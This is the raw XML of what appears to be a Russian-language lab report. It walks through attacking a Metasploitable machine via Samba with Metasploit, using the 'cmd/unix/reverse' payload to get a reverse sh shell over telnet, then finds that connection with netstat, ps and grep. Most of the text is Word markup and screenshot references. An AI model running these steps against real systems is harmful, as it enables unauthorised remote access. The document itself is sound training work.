          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>show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2C6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>payloads</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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установка </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004E62C6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>payload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, осуществляющего передачу </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004E62C6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>sh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-консоли по </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004E62C6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>telnet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, для </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004E62C6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>эксплоита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E62C6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>set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PAYLOAD </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004E62C6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>cmd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unix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reverse</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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вывод списка доступных опций для </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004E62C6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>эксплоита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E62C6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>show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2C6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>options</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="004E62C6" w:rsidRPr="004E62C6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>установка значения параметров следующим образом: RHOST MS_IP, RPORT &lt;указать порт, ранее&gt;, LHOST KL_IP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E62C6" w:rsidRPr="004E62C6" w:rsidRDefault="00F56C29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активация </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>эксплоита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exploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="004E62C6" w:rsidRPr="00832F02" w:rsidRDefault="004E62C6" w:rsidP="004E62C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>проверка успешности атаки с помощью определения имени хоста (имя машины-жертвы), информации о ядре операционной системы, о системном пользователе, от чьего имени осуществлено соединение с системой</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000E0EC6" w:rsidRDefault="004E62C6" w:rsidP="004E62C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4E62C6" w:rsidRPr="004E62C6" w:rsidRDefault="004E62C6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7464" w:dyaOrig="4692">
          <v:shape id="_x0000_i1035" type="#_x0000_t75" style="width:373.2pt;height:234.6pt" o:ole="">
            <v:imagedata r:id="rId11" o:title=""/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Paint.Picture" ShapeID="_x0000_i1035" DrawAspect="Content" ObjectID="_1715648187" r:id="rId12"/>
        </w:object>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E62C6" w:rsidRPr="004E62C6" w:rsidRDefault="004E62C6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7296" w:dyaOrig="1032">
          <v:shape id="_x0000_i1036" type="#_x0000_t75" style="width:364.8pt;height:51.6pt" o:ole="">
            <v:imagedata r:id="rId13" o:title=""/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Paint.Picture" ShapeID="_x0000_i1036" DrawAspect="Content" ObjectID="_1715648188" r:id="rId14"/>
        </w:object>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E62C6" w:rsidRPr="004E62C6" w:rsidRDefault="004E62C6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8040" w:dyaOrig="6336">
          <v:shape id="_x0000_i1037" type="#_x0000_t75" style="width:379.2pt;height:298.8pt" o:ole="">
            <v:imagedata r:id="rId15" o:title=""/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Paint.Picture" ShapeID="_x0000_i1037" DrawAspect="Content" ObjectID="_1715648189" r:id="rId16"/>
        </w:object>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E62C6" w:rsidRPr="004E62C6" w:rsidRDefault="004E62C6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8292" w:dyaOrig="6744">
          <v:shape id="_x0000_i1039" type="#_x0000_t75" style="width:401.4pt;height:326.4pt" o:ole="">
            <v:imagedata r:id="rId17" o:title=""/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Paint.Picture" ShapeID="_x0000_i1039" DrawAspect="Content" ObjectID="_1715648190" r:id="rId18"/>
        </w:object>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E62C6" w:rsidRPr="00F56C29" w:rsidRDefault="00F56C29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7956" w:dyaOrig="5208">
          <v:shape id="_x0000_i1041" type="#_x0000_t75" style="width:397.8pt;height:260.4pt" o:ole="">
            <v:imagedata r:id="rId19" o:title=""/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Paint.Picture" ShapeID="_x0000_i1041" DrawAspect="Content" ObjectID="_1715648191" r:id="rId20"/>
        </w:object>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F56C29" w:rsidRPr="00F56C29" w:rsidRDefault="00F56C29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8208" w:dyaOrig="1200">
          <v:shape id="_x0000_i1042" type="#_x0000_t75" style="width:403.2pt;height:58.8pt" o:ole="">
            <v:imagedata r:id="rId21" o:title=""/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Paint.Picture" ShapeID="_x0000_i1042" DrawAspect="Content" ObjectID="_1715648192" r:id="rId22"/>
        </w:object>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F56C29" w:rsidRPr="00F56C29" w:rsidRDefault="00F56C29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7560" w:dyaOrig="444">
          <v:shape id="_x0000_i1044" type="#_x0000_t75" style="width:378pt;height:22.2pt" o:ole="">
            <v:imagedata r:id="rId23" o:title=""/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Paint.Picture" ShapeID="_x0000_i1044" DrawAspect="Content" ObjectID="_1715648193" r:id="rId24"/>
        </w:object>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F56C29" w:rsidRPr="00F56C29" w:rsidRDefault="00F56C29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8052" w:dyaOrig="4872">
          <v:shape id="_x0000_i1049" type="#_x0000_t75" style="width:397.2pt;height:240.6pt" o:ole="">
            <v:imagedata r:id="rId25" o:title=""/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Paint.Picture" ShapeID="_x0000_i1049" DrawAspect="Content" ObjectID="_1715648194" r:id="rId26"/>
        </w:object>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F56C29" w:rsidRPr="00F56C29" w:rsidRDefault="00F56C29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7320" w:dyaOrig="1416">
          <v:shape id="_x0000_i1051" type="#_x0000_t75" style="width:366pt;height:70.8pt" o:ole="">
            <v:imagedata r:id="rId27" o:title=""/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Paint.Picture" ShapeID="_x0000_i1051" DrawAspect="Content" ObjectID="_1715648195" r:id="rId28"/>
        </w:object>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F56C29" w:rsidRDefault="00F56C29" w:rsidP="004E62C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8220" w:dyaOrig="4428">
          <v:shape id="_x0000_i1052" type="#_x0000_t75" style="width:398.4pt;height:214.8pt" o:ole="">
            <v:imagedata r:id="rId29" o:title=""/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Paint.Picture" ShapeID="_x0000_i1052" DrawAspect="Content" ObjectID="_1715648196" r:id="rId30"/>
        </w:object>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E62C6" w:rsidRDefault="00F56C29" w:rsidP="00F56C29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произведена </w:t>
      </w:r>
      <w:r w:rsidRPr="00F56C29">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">атака на </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F56C29">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Metasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00F56C29" w:rsidRDefault="00F56C29" w:rsidP="00F56C29">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F56C29" w:rsidRPr="00F56C29" w:rsidRDefault="00F56C29" w:rsidP="00F56C29">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F56C29">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F56C29">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Форензика</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00F56C29" w:rsidRDefault="00F56C29" w:rsidP="00F56C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F56C29" w:rsidRPr="003950B7" w:rsidRDefault="00F56C29" w:rsidP="00F56C2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</w:t>
      </w:r>
      <w:r w:rsidRPr="00F56C29">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>ыявление аномальной активности на машине-жертве</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F56C29" w:rsidRPr="003950B7" w:rsidRDefault="00F56C29" w:rsidP="00F56C2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выявить аномальную активность на машине-жертве и произвести анализ</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F56C29" w:rsidRPr="003950B7" w:rsidRDefault="00F56C29" w:rsidP="00F56C2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Pr="00F56C29">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>netstat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="007B5CC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B5CC5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ps</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="007B5CC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7B5CC5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>grep</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00F56C29" w:rsidRDefault="00F56C29" w:rsidP="00F56C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F56C29" w:rsidRDefault="00F56C29" w:rsidP="00F56C2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аномальная активность на машине-жертве не выявлена</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F56C29" w:rsidRDefault="00F56C29" w:rsidP="00F56C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F56C29" w:rsidRDefault="00F56C29" w:rsidP="00F56C2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F56C29" w:rsidRPr="00F56C29" w:rsidRDefault="00F56C29" w:rsidP="00F56C2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F56C29">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>выявление аномальной активности на машине-жертве</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F56C29" w:rsidRPr="00F56C29" w:rsidRDefault="00F56C29" w:rsidP="00F56C29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F56C29">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>повышение привилегии до привилегий супер-пользователя</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F56C29" w:rsidRPr="00F56C29" w:rsidRDefault="00F56C29" w:rsidP="00F56C29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F56C29">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">осуществление поиска аномальной активности с помощью утилиты </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F56C29">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>netstat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F56C29">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> – определение перечня «подозрительно» открытых портов и системных процессов, работающих на этих портах</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F56C29" w:rsidRPr="00F56C29" w:rsidRDefault="00F56C29" w:rsidP="00F56C29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F56C29">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>анализ таких системных процессов (результатом анализа должно быть обнаружение «подозрительного» соединения – IP-адреса и порта «атакующего»)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F56C29" w:rsidRPr="00F56C29" w:rsidRDefault="00F56C29" w:rsidP="00F56C29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F56C29">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">анализ системных процессов, инициированных «атакующим» и работающих с портом «атакующего» (анализ выполняется по определенному на предыдущем шаге номеру порта «атакующего», результатом должно быть обнаружение передачи </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F56C29">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F56C29">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">-консоли средствами </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F56C29">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>telnet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F56C29">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F56C29" w:rsidRPr="00832F02" w:rsidRDefault="00F56C29" w:rsidP="00F56C29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F56C29">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>сохранение результатов анализа в файл /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F56C29">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>var</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F56C29">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F56C29">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F56C29">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>/samba.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F56C29" w:rsidRDefault="00F56C29" w:rsidP="00F56C2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F56C29" w:rsidRPr="00F56C29" w:rsidRDefault="00F56C29" w:rsidP="00F56C29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8628" w:dyaOrig="3480">
          <v:shape id="_x0000_i1054" type="#_x0000_t75" style="width:404.4pt;height:163.2pt" o:ole="">
            <v:imagedata r:id="rId31" o:title=""/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Paint.Picture" ShapeID="_x0000_i1054" DrawAspect="Content" ObjectID="_1715648197" r:id="rId32"/>
        </w:object>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F56C29" w:rsidRPr="00F56C29" w:rsidRDefault="00F56C29" w:rsidP="00F56C29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5340" w:dyaOrig="420">
          <v:shape id="_x0000_i1056" type="#_x0000_t75" style="width:267pt;height:21pt" o:ole="">
            <v:imagedata r:id="rId33" o:title=""/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Paint.Picture" ShapeID="_x0000_i1056" DrawAspect="Content" ObjectID="_1715648198" r:id="rId34"/>
        </w:object>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F56C29" w:rsidRDefault="00F56C29" w:rsidP="00F56C29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object w:dxaOrig="7620" w:dyaOrig="228">
          <v:shape id="_x0000_i1057" type="#_x0000_t75" style="width:381pt;height:11.4pt" o:ole="">
            <v:imagedata r:id="rId35" o:title=""/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Paint.Picture" ShapeID="_x0000_i1057" DrawAspect="Content" ObjectID="_1715648199" r:id="rId36"/>
        </w:object>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F56C29" w:rsidRDefault="007B5CC5" w:rsidP="00F56C29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выявлена активность на машине-жертве, произведён анализ</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007B5CC5" w:rsidRDefault="007B5CC5" w:rsidP="007B5CC5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007B5CC5" w:rsidRPr="007B5CC5" w:rsidRDefault="007B5CC5" w:rsidP="007B5CC5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B5CC5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">5. </w:t>
      </w:r>
      <w:r w:rsidRPr="007B5CC5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Оформление результатов работы</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CD5D42" w:rsidRDefault="007B5CC5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:object w:dxaOrig="8664" w:dyaOrig="2100">
          <v:shape id="_x0000_i1058" type="#_x0000_t75" style="width:433.2pt;height:105pt" o:ole="">
            <v:imagedata r:id="rId37" o:title=""/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Paint.Picture" ShapeID="_x0000_i1058" DrawAspect="Content" ObjectID="_1715648200" r:id="rId38"/>
        </w:object>
      </w:r>
    </w:p>
    <w:p w:rsidR="007B5CC5" w:rsidRPr="007B5CC5" w:rsidRDefault="007B5CC5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="007B5CC5" w:rsidRPr="007B5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1093C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0088A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05FD4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="121295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47890"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="21528B3A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D3DBD"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="71B006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E4988"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="42D43E8C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CAB"/>
    <w:rsid w:val="000C0CAB"/>
    <w:rsid w:val="000E0EC6"/>
    <w:rsid w:val="004E62C6"/>
    <w:rsid w:val="007B5CC5"/>
    <w:rsid w:val="00CD5D42"/>
    <w:rsid w:val="00F56C29"/>
    <w:rsid w:val="00FC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F81EB"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{8357F7B7-EE8C-42C3-B749-B5C0719C9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C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1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-06-01T23:12:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-06-02T01:02:00Z</dcterms:modified>
</cp:coreProperties>
</file>